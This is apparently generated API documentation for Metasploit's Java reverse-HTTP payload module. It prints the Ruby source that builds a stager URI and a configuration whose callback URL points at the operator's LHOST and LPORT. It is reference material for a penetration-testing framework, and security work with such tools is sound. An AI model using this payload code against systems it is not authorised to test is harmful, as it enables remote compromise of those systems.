Module: Msf::Payload::Java::ReverseHttp

Includes:
Msf::Payload::Java, PayloadOptions, TransportConfig, UUID::Options
Included in:
ReverseHttps
Defined in:
lib/msf/core/payload/java/reverse_http.rb

Overview

Complex payload generation for Java that speaks HTTP(S)

Constant Summary

Constants included from Rex::Payloads::Meterpreter::UriChecksum

Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN_MAX_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITP, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INIT_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MIN_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MODES, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_UUID_MIN_LEN

Instance Method Summary collapse

Methods included from UUID::Options

#generate_payload_uuid, #generate_uri_uuid_mode, #record_payload_uuid, #record_payload_uuid_url

Methods included from Rex::Payloads::Meterpreter::UriChecksum

#generate_uri_checksum, #generate_uri_uuid, #process_uri_resource, #uri_checksum_lookup

Methods included from Msf::Payload::Java

#class_files, #generate, #generate_axis2, #generate_default_stage, #generate_jar, #generate_stage, #generate_war, #stage_class_files

Methods included from TransportConfig

#transport_config_bind_named_pipe, #transport_config_bind_tcp, #transport_config_reverse_http, #transport_config_reverse_https, #transport_config_reverse_ipv6_tcp, #transport_config_reverse_named_pipe, #transport_config_reverse_tcp, #transport_config_reverse_udp, #transport_uri_components

Instance Method Details

#generate_uri(opts = {}) ⇒ Object

Generate the URI for the initial stager


46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# File 'lib/msf/core/payload/java/reverse_http.rb', line 46

def generate_uri(opts={})
  ds = opts[:datastore] || datastore
  uri_req_len = ds['StagerURILength'].to_i

  # Choose a random URI length between 30 and 255 bytes
  if uri_req_len == 0
    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
  end

  if uri_req_len < 5
    raise ArgumentError, "Minimum StagerURILength is 5"
  end

  generate_uri_uuid_mode(:init_java, uri_req_len)
end

#initialize(*args) ⇒ Object

Register Java reverse_http specific options


26
27
28
29
30
31
32
33
34
# File 'lib/msf/core/payload/java/reverse_http.rb', line 26

def initialize(*args)
  super
  register_advanced_options(
    [
      OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']),
    ] +
    Msf::Opt::http_header_options
  )
end

#schemeObject

Scheme defaults to http


86
87
88
# File 'lib/msf/core/payload/java/reverse_http.rb', line 86

def scheme
  'http'
end

#stager_config(opts = {}) ⇒ Object

Generate configuration that is to be included in the stager.


65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
# File 'lib/msf/core/payload/java/reverse_http.rb', line 65

def stager_config(opts={})
  uri = generate_uri(opts)
  ds = opts[:datastore] || datastore
  c = super

  c << "HeaderUser-Agent=#{ds["HttpUserAgent"]}\n" if ds["HttpUserAgent"]
  c << "HeaderHost=#{ds["HttpHostHeader"]}\n" if ds["HttpHostHeader"]
  c << "HeaderReferer=#{ds["HttpReferer"]}\n" if ds["HttpReferer"]
  c << "HeaderCookie=#{ds["HttpCookie"]}\n" if ds["HttpCookie"]
  c << "URL=#{scheme}://#{ds['LHOST']}"
  c << ":#{ds['LPORT']}" if ds['LPORT']
  c << luri
  c << uri
  c << "\n"

  c
end

#transport_config(opts = {}) ⇒ Object

Generate the transport-specific configuration


39
40
41
# File 'lib/msf/core/payload/java/reverse_http.rb', line 39

def transport_config(opts={})
  transport_config_reverse_http(opts)
end

#wfs_delayObject

Always wait at least 20 seconds for this payload (due to staging delays)


93
94
95
# File 'lib/msf/core/payload/java/reverse_http.rb', line 93

def wfs_delay
  20
end